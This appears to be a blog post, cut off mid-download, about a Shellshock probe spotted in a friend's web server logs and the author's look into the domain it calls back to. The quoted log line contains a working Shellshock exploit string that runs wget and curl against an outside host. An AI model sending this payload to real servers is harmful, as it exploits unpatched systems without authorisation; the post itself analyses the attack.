Indirect shellshock security scanning via other people's logfiles
One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like: 24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST'" Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name: Seasonally-appropriate designer labels. Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be. Was the domain compromised and I should try to notify them? Hmm. What the heck - try to download the page: --2016-04-30 13:38:26-- http://closettransfer.com/IPTRANSITTEST Resolving closettransfer.